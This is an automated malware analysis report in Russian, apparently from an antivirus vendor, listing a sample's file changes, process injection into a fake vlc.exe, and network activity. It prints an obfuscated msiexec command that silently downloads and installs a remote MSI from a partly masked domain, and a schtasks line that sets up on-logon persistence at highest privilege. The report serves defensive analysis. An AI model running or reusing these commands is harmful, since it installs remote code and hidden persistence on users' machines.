Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\vlc.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://un####slashclub.com/jss/2084104570.msi /qn
Внедряет код в
следующие пользовательские процессы:
- vlc.exe
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{ae7bbdf8-a1f8-4b97-99d8-0253a7bb49e4}.tmp
- %TEMP%\e33fb98cc1\log.txt
- %APPDATA%\videolan\vlc.exe
- %TEMP%\tmpc1fb.tmp.bat
- nul
Удаляет следующие файлы
- %TEMP%\e33fb98cc1\log.txt
Подменяет следующие файлы
- %TEMP%\e33fb98cc1\log.txt
Сетевая активность
TCP
Запросы HTTP GET
- http://un####slashclub.com/jss/2084104570.msi
- http://ap#.#pify.org/
UDP
- DNS ASK un####slashclub.com
- DNS ASK ap#.#pify.org
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msib8eb.tmp'
- '%APPDATA%\videolan\vlc.exe'
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://un####slashclub.com/jss/2084104570.msi /qn' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn vlc.exe /tr '"%APPDATA%\VideoLAN\vlc.exe"' & exit' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\msiexec.exe' /i http://un####slashclub.com/jss/2084104570.msi /qn
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn vlc.exe /tr '"%APPDATA%\VideoLAN\vlc.exe"' & exit
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\tmpC1FB.tmp.bat""
- '%WINDIR%\syswow64\schtasks.exe' /create /f /sc onlogon /rl highest /tn vlc.exe /tr '"%APPDATA%\VideoLAN\vlc.exe"'
- '%WINDIR%\syswow64\timeout.exe' 3
